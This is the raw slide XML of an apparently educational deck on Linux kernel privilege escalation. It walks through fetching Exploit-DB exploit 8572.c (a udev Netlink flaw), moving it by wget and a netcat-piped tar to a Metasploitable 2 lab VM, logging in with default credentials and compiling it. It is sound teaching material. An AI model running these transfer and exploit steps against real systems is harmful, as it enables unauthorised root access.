              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFont typeface="Roboto"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1028533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43435" y="95700"/>
            <a:ext cx="8875059" cy="576000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux - Kernel Exploit</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500" dirty="0"/>
              <a:t>There are vulnerabilities found in the Linux kernel and Attackers exploit these vulnerabilities to gain root access to a Linux system. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>How attackers do kernel exploits…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>Learn about the vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>Develop or acquire exploit code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>Transfer the exploit onto the target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>Execute the exploit on the target</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="414922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marL="457200" lvl="0" indent="-317500" algn="l" rtl="0">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marL="457200" lvl="0" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Remember, if you have any doubts as to if something is legal or authorised, just don't do it until you are able to confirm you are allowed to.</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63" name="Google Shape;63;p13"/>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The Legal Bit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ko-KR" dirty="0"/>
              <a:t>Kernel Exploit using Exploit-DB</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500" dirty="0"/>
              <a:t>For this kernel exploitation, we will use 8572.c exploit in Exploit DB and Metasploit 2 running in VM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8572.c exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>takes advantage of a flow in the UDEV device manager, allowing for code execution via an unverified </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>Netlink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t> message</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>searchsploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> privilege | grep -i </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> | grep -i kernel | grep 2.6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>locate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/local/8572.c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/share/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exploitdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/exploits/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/local/8572.c </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cd /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0">
              <a:solidFill>
                <a:srgbClr val="09CECE"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="da-DK" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wget </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>your_kali_ip_address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/local/8752.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> to save 8572.c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>telnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>metasploitable_ip_address</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
              <a:solidFill>
                <a:srgbClr val="EB3C68"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lvp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 4321(can be any port number) | tar -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
              <a:solidFill>
                <a:srgbClr val="EB3C68"/>
              </a:solidFill>
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0">
              <a:solidFill>
                <a:srgbClr val="09CECE"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="716516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ko-KR" dirty="0"/>
              <a:t>Kernel Exploit using Exploit-DB</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1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>telnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>metasploitable_ip_address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>and login to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>metasploitable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>msfadmin:msfadmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lvp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 4321(can be any port number) | tar -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>Open a new tab, tar the exploit and pipe the output to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>, wait a bit for the file transfer and exit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tar -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> - 8572.c | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t>metasploitable_ip_address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="EB3C68"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4321</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Back in the first tab, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ls -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 8572.c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> to check if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0"/>
              <a:t>the file has been transferred </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> -o exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8572.c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>-&gt; compile the exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>run cat /proc/net/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="09CECE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>netlink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1500" dirty="0">
